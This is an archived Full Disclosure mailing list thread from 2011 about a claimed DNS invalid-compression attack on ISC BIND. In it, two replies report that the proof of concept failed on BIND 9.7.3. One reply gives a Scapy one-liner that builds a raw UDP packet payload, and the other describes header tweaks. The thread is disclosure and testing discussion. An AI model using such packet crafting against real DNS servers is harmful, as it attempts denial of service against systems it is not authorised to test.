Full Disclosure mailing list archives
Re: Semi 0day DNS Invalid Compression attack
From: Francisco J. Gómez Rodríguez <ffranz () iniqua com>
Date: Thu, 14 Jul 2011 12:27:19 +0200
Proof dont work neither on my own ISC BIND 9.7.3. :-( By the way, you can use Scapy to create the packet: a=IP(dst="127.0.0.1")/UDP(sport=RandInt(),chksum=0)/Raw( load='\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00') regards... On Mon, Jul 11, 2011 at 3:31 PM, Kai <kai () rhynn net> wrote:
Hi, tested on isc bind 9.7.3, on opensuse 11.4. sent a few packets to myself: --> [1000000]: (127.0.0.1)->(127.0.0.1) --> Done. and named felt beautiful along the test: PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 2844 named 20 0 111m 22m 2456 S 0 0.2 0:00.09 named named -V: BIND 9.7.3 built with '--prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--localstatedir=/var' '--libdir=/usr/lib' '--includedir=/usr/include/bind' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--with-openssl' '--enable-threads' '--with-libtool' '--enable-runidn' '--with-libxml2' '--with-dlz-mysql' '--with-dlz-ldap' '--with-gssapi' 'CFLAGS=-fomit-frame-pointer -fmessage-length=0 -O2 -Wall -D_FORTIFY_SOURCE=2 -fstack-protector -funwind-tables -fasynchronous-unwind-tables -g -fno-strict-aliasing' 'LDFLAGS=-L/usr/lib' you said that packet was like# 4500 002b 512f 4000 3411 92a9 2989 601eso i've changed packet header to "\x45\x00\x00\x2b\x51\x2f\x40\x00\x34\x11\x92\xa9" and length to "\x00\x4a" (74, right?) but still no look. Any thoughts? -- Cheers, Kai _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Semi 0day DNS Invalid Compression attack David (Jul 11)
- Re: Semi 0day DNS Invalid Compression attack Kai (Jul 11)
- Re: Semi 0day DNS Invalid Compression attack Francisco J . Gómez Rodríguez (Jul 14)
- Re: Semi 0day DNS Invalid Compression attack Kai (Jul 11)